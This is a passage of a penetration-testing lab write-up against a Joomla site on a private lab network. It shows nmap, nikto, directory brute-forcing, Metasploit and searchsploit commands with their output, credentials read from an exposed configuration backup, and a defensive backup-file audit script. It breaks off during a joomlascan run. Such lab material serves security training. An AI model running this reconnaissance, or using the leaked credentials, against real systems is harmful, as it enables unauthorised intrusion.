Contents
Preface
External penetration
External reconnaissance and foothold
1. arp
2. nmap
3. nikto
4. whatweb
5. gobuster
6. dirsearch
CMS
1. Home page content
2. The /configuration.php~ path
3. The /administrator directory
4. Joomla! version detection
5. joomlascan Python script
6. joomscan Perl script
MySQL
1. Remote login
2. Viewing sensitive data
Logging in to the admin backend
1. Successful login
2. RCE vulnerability
AntSword connection
1. Writing a shell
2. disable_functions bypass
SSH connection
Privilege escalation
Internal network penetration
Lateral movement 1
1. Generating the payload file
2. Starting the listener
3. Adding an internal route
Lateral movement 2
1. Setting up the listener
2. Entering meterpreter
3. Adding an internal route
4. SOCKS5 proxy
1. earthworm tunnelling tool
2. Configuring proxychains4.conf
5. Internal host discovery
1. First module
2. Second module
6. Internal network attacks
1. Password brute-forcing
2. psexec tool
3. wmiexec.py
7. Get flag
Preface
In penetration testing, black box testing and white box testing are two common approaches used to assess a target system's security and weaknesses. Their meaning and differences are as follows:
1. Black Box Testing:
Black box testing is carried out from an external perspective: the tester knows nothing about the internal structure or implementation details of the system under test. The system is treated as a black box, and only its inputs and outputs are considered, not how it works internally.
Black box testing focuses mainly on the system's functionality, security vulnerabilities and misconfigurations. The tester plays the role of an external attacker and tries to discover potential vulnerabilities from the system's observable behaviour and interfaces.
2. White Box Testing:
White box testing is carried out from an internal perspective: the tester has full knowledge of the internal structure, design and code of the system under test, and can inspect and analyse internal details such as source code, configuration files and technical documentation.
White box testing focuses mainly on evaluating the system's structure, design, security implementation and code quality. The tester can use techniques such as static code analysis and code review to find potential vulnerabilities and security risks.
Each approach has its own strengths and suitable scenarios. Black box testing emphasises the system's functionality and the user's point of view, and can simulate the behaviour of a real attacker. White box testing emphasises internal security and code quality, and can dig into implementation details to find hidden vulnerabilities.
In practice, penetration tests usually combine black box and white box methods to assess a system's security comprehensively. This identifies and fixes potential vulnerabilities from different angles and improves the system's defences.
Lab setup
1. First add a VMnet2 network adapter with the subnet address 192.168.93.0.
2. Start the CentOS target and run "service network restart" to obtain its IP addresses. CentOS has two adapters: a bridged adapter, which provides the external IP, and a VMnet2 adapter, which provides the internal IP.
3. CentOS is the only target that needs changes; do not touch the others, and never reboot them, because some of their services do not start automatically. If you need to shut down, suspend each target first.
4. Because the target uses a bridged adapter, the Kali attacker machine's adapter must also be in bridged mode.
5. On CentOS, run "ifconfig eth0" to check whether it obtained an IP; on Kali, run "ip a" to check the same.
6. Finally, open the target in a browser to confirm it can be reached.
192.168.93.10   WIN-8GA56TNV3MV
192.168.93.20   WIN2008
192.168.93.30   WIN7
192.168.93.100  (external: 192.168.1.21)  CentOS
192.168.93.120  Ubuntu
192.168.1.20    Kali
This exercise is a black box test, so we start with no passwords. The goal is to gain control of the domain controller and find the important files on it.
External penetration
External reconnaissance and foothold
1. arp
┌──(root㉿ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.1.20
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 00:03:0f:2b:90:20 Digital China (Shanghai) Networks Ltd.
192.168.1.2 d4:8f:a2:9f:51:49 Huawei Device Co., Ltd.
192.168.1.6 3c:55:76:dc:ab:f5 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.5 7c:b5:66:a5:f0:a5 Intel Corporate
192.168.1.14 7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.13 7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.21 00:0c:29:32:46:c9 VMware, Inc.
192.168.1.4 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.9 fa:f1:bf:c4:d1:1d (42:f1:e2:49:51:a5) (Unknown: locally administered)
192.168.1.16 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.18 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.7 c4:75:ab:58:e4:8b (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.8 3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.17 42:45:ab:5e:e9:ce (42:f1:e2:49:51:a5) (Unknown: locally administered)
14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 14 responded
2. nmap
Port scan
┌──(root㉿ru)-[~/lianxi]
└─# nmap -p- 192.168.1.21 --min-rate 10000 -oA ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 12:06 CST
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds
Extracting the ports
┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap
# Nmap 7.94 scan initiated Fri Dec 1 12:06:52 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.1.21
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
# Nmap done at Fri Dec 1 12:06:58 2023 -- 1 IP address (1 host up) scanned in 5.45 seconds
┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap | awk '{print($1)}' | head -n 8 | tail -n 3 | awk -F "/" '{print($1)}' | xargs -n3 | sed 's/ /,/g'
22,80,3306
// This pipeline uses the awk, sed, head, tail and xargs commands.
Service and OS detection
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA XX
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:22 CST
Nmap scan report for 192.168.1.21
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 25:84:c6:cc:2c:8a:7b:8f:4a:7c:60:f1:a3:c9:b0:22 (DSA)
|_ 2048 58:d1:4c:59:2d:85:ae:07:69:24:0a:dd:72:0f:45:a5 (RSA)
80/tcp open http nginx 1.9.4
|_http-title: 502 Bad Gateway
|_http-server-header: nginx/1.9.4
3306/tcp open tcpwrapped
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.63 seconds
UDP scan
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sU 192.168.1.21 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:23 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
2/udp closed compressnet
9000/udp closed cslistener
16862/udp closed unknown
41971/udp closed unknown
46836/udp closed unknown
49185/udp closed unknown
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
Vulnerability scripts
┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 15:20 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-dombased-xss:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
| Found the following indications of potential DOM based XSS:
|
| Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')
|_ Pages: http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/index.php/6-your-template, http://192.168.1.21:80/index.php/5-your-modules, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php/4-about-your-home-page
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.21:80/
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/6-your-template
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/login
| Form id: mod-search-searchword87
| Form action: /index.php/login
|
| Path: http://192.168.1.21:80/index.php/login
| Form id: username-lbl
| Form action: /index.php/login?task=user.login
|
| Path: http://192.168.1.21:80/index.php/5-your-modules
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/author-login
| Form id: mod-search-searchword87
| Form action: /index.php/author-login
|
| Path: http://192.168.1.21:80/index.php/author-login
| Form id: username-lbl
| Form action: /index.php/author-login?task=user.login
|
| Path: http://192.168.1.21:80/index.php
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/4-about-your-home-page
| Form id: mod-search-searchword87
|_ Form action: /index.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /robots.txt: Robots file
| /administrator/manifests/files/joomla.xml: Joomla version 3.9.12
| /language/en-GB/en-GB.xml: Joomla version 3.9.12
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 74.52 seconds
3. nikto
┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.1.21 nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.1.21
+ Target Hostname: 192.168.1.21
+ Target Port: 80
+ Start Time: 2023-12-01 15:19:50 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.9.4
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/libraries/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/modules/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cache/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/layouts/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/includes/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/administrator/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cli/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/tmp/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/plugins/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/bin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/language/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/components/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 14 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /administrator/: This might be interesting.
+ /bin/: This might be interesting.
+ /includes/: This might be interesting.
+ /tmp/: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8924 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time: 2023-12-01 15:20:26 (GMT8) (36 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
4. whatweb
┌──(root㉿ru)-[~/lianxi]
└─# whatweb -v http://192.168.1.21
WhatWeb report for http://192.168.1.21
Status : 200 OK
Title : Home
IP : 192.168.1.21
Country : RESERVED, ZZ
Summary : Bootstrap, Cookies[d238a471ae12a7732425ae4995e23fce], HTML5, HTTPServer[nginx/1.9.4], HttpOnly[d238a471ae12a7732425ae4995e23fce], JQuery, MetaGenerator[Joomla! - Open Source Content Management], nginx[1.9.4], OpenSearch[http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch], Script
Detected Plugins:
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : d238a471ae12a7732425ae4995e23fce
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : nginx/1.9.4 (from server string)
[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie
String : d238a471ae12a7732425ae4995e23fce
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Joomla! - Open Source Content Management
[ OpenSearch ]
This plugin identifies open search and extracts the URL.
OpenSearch is a collection of simple formats for the
sharing of search results.
String : http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.
Version : 1.9.4
Website : http://nginx.net/
HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.9.4
Date: Mon, 07 Oct 2019 08:29:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4001
Connection: close
Set-Cookie: d238a471ae12a7732425ae4995e23fce=r8kse6ihf5gjio9jiuegcd1qvj; path=/; HttpOnly
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Fri, 01 Dec 2023 07:23:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
5. gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.1.21 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.21
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://192.168.1.21/images/]
/media (Status: 301) [Size: 312] [--> http://192.168.1.21/media/]
/templates (Status: 301) [Size: 316] [--> http://192.168.1.21/templates/]
/modules (Status: 301) [Size: 314] [--> http://192.168.1.21/modules/]
/bin (Status: 301) [Size: 310] [--> http://192.168.1.21/bin/]
/plugins (Status: 301) [Size: 314] [--> http://192.168.1.21/plugins/]
/includes (Status: 301) [Size: 315] [--> http://192.168.1.21/includes/]
/language (Status: 301) [Size: 315] [--> http://192.168.1.21/language/]
/components (Status: 301) [Size: 317] [--> http://192.168.1.21/components/]
/cache (Status: 301) [Size: 312] [--> http://192.168.1.21/cache/]
/libraries (Status: 301) [Size: 316] [--> http://192.168.1.21/libraries/]
/tmp (Status: 301) [Size: 310] [--> http://192.168.1.21/tmp/]
/layouts (Status: 301) [Size: 314] [--> http://192.168.1.21/layouts/]
/administrator (Status: 301) [Size: 320] [--> http://192.168.1.21/administrator/]
/cli (Status: 301) [Size: 310] [--> http://192.168.1.21/cli/]
6. dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.1.21 -e*
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490
Output File: /root/.dirsearch/reports/192.168.1.21/_23-12-01_15-26-31.txt
Error Log: /root/.dirsearch/logs/errors-23-12-01_15-26-31.log
Target: http://192.168.1.21/
[15:26:31] Starting:
[15:26:50] 200 - 18KB - /LICENSE.txt
[15:26:50] 200 - 5KB - /README.txt
[15:26:59] 403 - 277B - /administrator/.htaccess
[15:26:59] 301 - 320B - /administrator -> http://192.168.1.21/administrator/
[15:26:59] 200 - 5KB - /administrator/
[15:26:59] 200 - 2KB - /administrator/includes/
[15:26:59] 200 - 31B - /administrator/cache/
[15:26:59] 200 - 5KB - /administrator/index.php
[15:26:59] 301 - 325B - /administrator/logs -> http://192.168.1.21/administrator/logs/
[15:26:59] 200 - 31B - /administrator/logs/
[15:27:02] 301 - 310B - /bin -> http://192.168.1.21/bin/
[15:27:02] 200 - 31B - /bin/
[15:27:03] 301 - 312B - /cache -> http://192.168.1.21/cache/
[15:27:03] 200 - 31B - /cache/
[15:27:04] 200 - 31B - /cli/
[15:27:04] 301 - 317B - /components -> http://192.168.1.21/components/
[15:27:04] 200 - 31B - /components/
[15:27:05] 200 - 0B - /configuration.php
[15:27:05] 200 - 2KB - /configuration.php~
[15:27:10] 200 - 3KB - /htaccess.txt
[15:27:11] 301 - 313B - /images -> http://192.168.1.21/images/
[15:27:11] 200 - 31B - /images/
[15:27:11] 301 - 315B - /includes -> http://192.168.1.21/includes/
[15:27:11] 200 - 31B - /includes/
[15:27:11] 200 - 16KB - /index.php
[15:27:11] 200 - 9KB - /index.php/login/
[15:27:13] 301 - 315B - /language -> http://192.168.1.21/language/
[15:27:13] 200 - 31B - /layouts/
[15:27:13] 301 - 316B - /libraries -> http://192.168.1.21/libraries/
[15:27:13] 200 - 31B - /libraries/
[15:27:15] 301 - 312B - /media -> http://192.168.1.21/media/
[15:27:15] 200 - 31B - /media/
[15:27:16] 301 - 314B - /modules -> http://192.168.1.21/modules/
[15:27:16] 200 - 31B - /modules/
[15:27:20] 200 - 31B - /plugins/
[15:27:21] 301 - 314B - /plugins -> http://192.168.1.21/plugins/
[15:27:23] 200 - 829B - /robots.txt
[15:27:24] 403 - 277B - /server-status
[15:27:24] 403 - 277B - /server-status/
[15:27:28] 301 - 316B - /templates -> http://192.168.1.21/templates/
[15:27:28] 200 - 31B - /templates/
[15:27:28] 200 - 31B - /templates/index.html
[15:27:28] 200 - 0B - /templates/protostar/
[15:27:28] 200 - 0B - /templates/system/
[15:27:28] 200 - 0B - /templates/beez3/
[15:27:30] 301 - 310B - /tmp -> http://192.168.1.21/tmp/
[15:27:30] 200 - 31B - /tmp/
[15:27:35] 200 - 2KB - /web.config.txt
CMS
1. Home page content
The home page holds some blog posts; after exploring it, nothing exploitable was found.
According to the hint, the site uses the Protostar template.
Probing shows that different content can be reached by changing this id number, but it seems to go no higher than 6.
2. The /configuration.php~ path
Directory enumeration turned up the site's configuration file, and with it the database account and password.
Username: testuser
Password: cvcvgjASD!@
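The leak here is an editor backup of configuration.php left inside the web root and served as plain text. As an added defender-side check (not part of the original write-up, and run against a constructed throw-away tree rather than the lab's files), the script below finds backup-style artifacts under a document root and flags those that carry credential keys.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit a web root for editor
# or manual backup files (configuration.php~, *.bak, *.swp, ...) that the web
# server will serve as plain text, and flag the ones that contain
# credential-style keys such as Joomla's JConfig $user / $password.

set -e

# make_sample_webroot: build a constructed, throw-away Joomla-like tree and
# print its path. Everything in it (names, the placeholder password) is made
# up for this example; it is not the lab's real configuration.
make_sample_webroot() {
    root="$(mktemp -d)"
    mkdir -p "$root/administrator"
    printf '<?php\nclass JConfig {\n    public $user = "dbuser";\n    public $password = "PLACEHOLDER_DB_PASSWORD";\n}\n' \
        > "$root/configuration.php"
    cp "$root/configuration.php" "$root/configuration.php~"      # editor backup (the lab's leak)
    cp "$root/configuration.php" "$root/configuration.php.bak"   # manual backup copy
    printf 'Options -Indexes\n' > "$root/.htaccess.swp"          # editor swap file, no secrets
    printf '<?php echo "ok";\n' > "$root/index.php"              # legitimate file, must not be reported
    printf '%s\n' "$root"
}

# find_backup_files DIR: one path per line for files whose names match common
# backup, swap and old-copy patterns. Sorted so the output is stable.
find_backup_files() {
    find "$1" -type f \( -name '*~' -o -name '*.bak' -o -name '*.old' -o -name '*.orig' \
                         -o -name '*.swp' -o -name '*.save' -o -name '#*#' \) | sort
}

# holds_credentials FILE: succeed if the file assigns keys that usually carry
# secrets in PHP config files ($password, $passwd, $secret, $user, $db).
holds_credentials() {
    grep -qiE '\$(password|passwd|secret|user|db)[[:space:]]*=' "$1"
}

# credential_leaks DIR: the subset of backup files that would leak credentials
# if fetched over HTTP; these are the ones to remove or block first.
credential_leaks() {
    find_backup_files "$1" | while IFS= read -r f; do
        if holds_credentials "$f"; then printf '%s\n' "$f"; fi
    done
}

# Usage: run against the constructed tree, then clean it up.
ROOT="$(make_sample_webroot)"
echo "backup artifacts under $ROOT:"
find_backup_files "$ROOT"
echo "of which leak credentials:"
credential_leaks "$ROOT"
rm -rf "$ROOT"
```

Pointing find_backup_files at a real document root (and, separately, denying these patterns in the web server configuration) closes the same gap the scanners above found.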
3. The /administrator directory
It really is Joomla!; on to the next probe.
4. Joomla! version detection
We can use the auxiliary module in msf to scan for the version.
msf6 > search Joomla_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/joomla_version normal No Joomla Version Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/joomla_version
msf6 >
msf6 > use 0
msf6 auxiliary(scanner/http/joomla_version) > show options
Module options (auxiliary/scanner/http/joomla_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the Joomla application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/joomla_version) > set rhosts 192.168.1.21
rhosts => 192.168.1.21
msf6 auxiliary(scanner/http/joomla_version) > exploit
[*] Server: nginx/1.9.4
[+] Joomla version: 3.9.12
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The scan shows the CMS version is 3.9.12, so we can now look for a matching exploit.
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Joomla 3.9.12
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit -m 43488.txt
Exploit: Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting
URL: https://www.exploit-db.com/exploits/43488
Path: /usr/share/exploitdb/exploits/php/webapps/43488.txt
Codes: CVE-2018-5263
Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /root/lianxi/43488.txt
┌──(root㉿ru)-[~/lianxi]
└─# ls
43488.txt ports.gnmap ports.nmap ports.xml port.txt udp.gnmap udp.nmap udp.xml vuln.gnmap vuln.nmap vuln.xml whatweb.txt XX.gnmap XX.nmap XX.xml
┌──(root㉿ru)-[~/lianxi]
└─# cat 43488.txt
# Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
# Date: 06-01-2018
# Software Link: https://stackideas.com/easydiscuss
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-5263
# Category: webapps
1. Description
Whenever a user edits a message with <\textarea> inside the body, everything after the <\textarea> will be executed in the user’s browser. Works with every version up to 4.0.20
2. Proof of Concept
Login with permissions to post a message, insert <\textarea> in the body and add any html code after that, whenever a user tries to edit that message the code writed after you closed the textarea will be executed
3. Solution:
Update to version 4.0.21
https://stackideas.com/blog/easydiscuss4021-update
We found a matching exploit, but these vulnerabilities all require administrator privileges, so we need to keep probing.
5. joomlascan Python script
┌──(root㉿ru)-[~/tools/JoomlaScan]
└─# python2 joomlascan.py -u http://192.168.1.21 -t 5
-------------------------------------------
Joomla Scan
Usage: python joomlascan.py <target>
Version 0.5beta - Database Entries 1235
created by Andrea Draghetti
-------------------------------------------
Robots file found: > http://192.168.1.21/robots.txt
No Error Log found
Start scan...with 10 concurrent threads!
Component found: com_actionlogs > http://192.168.1.21/index.php?option=com_actionlogs
On the administrator components
LICENSE file found > http://192.168.1.21/administrator/components/com_actionlogs/actionlogs.xml
Explorable Directory > http://192.168.1.21/components/com_actionlogs/
Explorable Directory > http://192.168.1.21/administrator/components/com_actionlogs/
Component found: com_admin > http://192.168.1.21/index.php?option=com_admin
On the administrator components
LICENSE file found > http://192.168.1.21/administrator/components/com_admin/admin.xml
Explorable Directory > http://192.168.1.21/components/com_admin/
Explorable Directory > http://192.168.1.21/administrator/components/com_admin/
Component found: com_ajax > http://192.168.1.21/index.php?option=com_ajax
But possibly it is not active or protected
LICENSE file found > http://192.168.1.21/administrator/components/com_ajax/ajax.xml
Explorable Directory > http://192.168.1.21/components/com_ajax/
Explorable Directory > http://192.168.1.21/administrator/components/com_ajax/
Component found: com_banners > http://192.168.1.21/index.php?option=com_banners
But possibly it is not active or protected
LICENSE file found > http://192.168.1.21/administrator/components/com_banners/banners.xml
Explorable Directory > http://192.168.1.21/components/com_banners/
Explorable Directory > http://192.168.1.21/administrator/components/com_banners/
Component found: com_config > http://192.168.1.21/index.php?option=com_config
Component found: com_contact > http://192.168.1.21/index.php?option=com_contact
LICENSE file found > http://192.168.1.21/administrator/components/com_contact/contact.xml
LICENSE file found > http://192.168.1.21/administrator/components/com_config/config.xml
Component found: com_content > http://192.168.1.21/index.php?option=com_content
Component found: com_contenthistory > http://192.168.1.21/index.php?option=com_contenthistory
But possibly it is not active or protected
Explorable Directory > http://192.168.1.21/components/com_config/
Explorable Directory > http://192.168.1.21/components/com_contact/
Explorable Directory > http://192.168.1.21/administrator/components/com_config/
LICENSE file found > http://192.168.1.21/administrator/components/com_content/content.xml
LICENSE file found > http://192.168.1.21/administrator/components/com_contenthistory/contenthistory.xml
Explorable Directory > http://192.168.1.21/administrator/components/com_contact/
Explorable Directory > http://192.168.1.21/components/com_contenthistory/
Explorable Directory > http://192.168.1.21/components/com_content/
Explorable Directory > http://192.168.1.21/administrator/components/com_contenthistory/
Explorable Directory > http://192.168.1.21/administrator/components/com_content/
Component found: com_fields > http://192.168.1.21/index.php?option=com_fields
But possibly it is not active or protected
LICENSE file found > http://192.168.1.21/administrator/components/com_fields/fields.xml
Explorable Directory > http://192.168.1.21/components/com_fields/
Explorable Directory > http://192.168.1.21/administrator/components/com_fields/
Component found: com_installer > http://192.168.1.21/index.php?option=com_installer
On the administrator components
LICENSE file found > http://192.168.1.21/administrator/components/com_installer/installer.xml
Explorable Directory > http://192.168.1.21/components/com_installer/
Explorable Directory > http://192.168.1.21/administrator/components/com_installer/
Component found: com_joomlaupdate > http://192.168.1.21/index.php?option=com_joomlaupdate
On the administrator components
LICENSE file found > http://192.168.1.21/administrator/components/com_joomlaupdate/joomlaupdate.xml
Explorable Directory > http://192.168.1.21/components/com_joomlaupdate/
Explorable Directory > http://192.168.1.21/administrator/components/com_joomlaupdate/
Component found: com_mailto > http://192.168.1.21/index.php?option=com_mailto
But possibly it is not active or protected
